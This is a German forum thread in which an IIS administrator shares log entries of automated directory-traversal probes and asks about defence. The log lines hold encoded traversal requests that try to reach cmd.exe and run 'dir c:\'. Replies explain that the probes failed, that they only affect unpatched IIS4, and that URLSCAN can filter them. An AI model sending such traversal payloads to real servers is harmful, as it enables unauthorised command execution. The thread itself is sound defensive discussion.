Elharter 11 Geschrieben 11. Januar 2006 Melden Teilen Geschrieben 11. Januar 2006 Hallo liebes Forum, habe soeben meine IIS Logfiles durchgestöbert und folgendes gefunden: 2006-01-10 22:27:17 82.53.92.219 - 192.168.111.11 80 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 404 - 2006-01-10 22:27:18 82.53.92.219 - 192.168.111.11 80 HEAD /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 404 - 2006-01-10 22:27:18 82.53.92.219 - 192.168.111.11 80 HEAD /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 404 - 2006-01-10 22:27:18 82.53.92.219 - 192.168.111.11 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:18 82.53.92.219 - 192.168.111.11 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 - 2006-01-10 22:27:19 82.53.92.219 - 192.168.111.11 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 - 2006-01-10 22:27:19 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:19 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:20 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:20 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:20 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:21 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:21 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:21 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:21 82.53.92.219 - 192.168.111.11 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 - 2006-01-10 22:27:23 82.53.92.219 - 192.168.111.11 80 HEAD /winnt/system32/cmd.exe Sieht ja nicht unbedingt sehr nett aus..... Wie kann ich überprüfen ob ich solchen Angriffen gewappnet bin? Zitieren Link zu diesem Kommentar
overlord 10 Geschrieben 11. Januar 2006 Melden Teilen Geschrieben 11. Januar 2006 Servus, also "gewappnet" ist eher das falsche Wort, denn sicher in dem Sinne kannst du nicht sein, da hier einfach jemand bzw. eher ein automat. script probiert, ob deine Kiste auf best. Anfragen reagiert. ...und ohne Erfolg, da Fehler 404 und 500. Solche ...hm....Abfragen (als Angriff kann man das nicht bezeichnen)...sind inzwischen die Regel und wenn du keine dementsprechenden Ordner/Files/Scripte/....auf deinem WWW hast und die Serversoftware up2date ist und natürlich die Firewall ausreichend konfiguriert ist, hast du schonmal nen guten Ansatz ;) Zitieren Link zu diesem Kommentar
zahni 554 Geschrieben 11. Januar 2006 Melden Teilen Geschrieben 11. Januar 2006 Die Attacken funktionieren nur bei uralten ungepatchten IIS4-Versionen. Du kann sowas beim IIS durch den Einsatz von URLSCAN schon vorher rausfiltern. -Zahni Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.